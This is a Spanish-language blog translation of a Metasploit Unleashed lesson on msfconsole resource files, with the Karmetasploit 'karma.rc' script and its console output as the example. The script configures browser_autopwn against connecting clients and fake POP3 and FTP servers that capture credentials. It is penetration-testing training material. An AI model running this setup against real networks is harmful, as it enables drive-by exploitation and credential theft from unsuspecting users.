Metasploit Unleashed en Espanol (16.2/18)

20.2.10

Recursos

Un recurso es simplemente un archivo de texto separada por lineas que contiene una secuencia de comandos para ser ejecutados en msfconsole. Uno de los recuros mas notables es Karmetasploit el archivo "karma.rc". Hechemos una breve mirada dentro de este archivo para tener una idea del contenido de un recurso.

<>load db_sqlite3
db_create /root/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run



use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

Como podemos ver, pasar un archivo como recurso para Metasploit permite tener una gran automatizacion. Puede configurar cualquier opcion y usar cualquier modulo con Metasploit usando un recurso y todos los comandos seran ejecutados en secuencia.

Hay dos metodos para cargar un archivo como recurso en Metasploit. Pueden ser pasados como opcion al msfconsole en la linea de comando usando el interruptor "-r" o puede ser cargado desde msfconsole usando el comando "resource".

root@bt4:/pentest/exploits/framework3# ./msfconsole -r karma.rc

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / _|/ _|/ / _| |
| | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
/|
|


=[ msf v3.3-dev
+ -- --=[ 372 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 149 aux


resource> load db_sqlite3

msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Publicadas por Jhyx las 1:41 p.m.  

Etiquetas:

0 comentarios:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)
Creative Commons License
Esta obra está bajo una licencia de Creative Commons.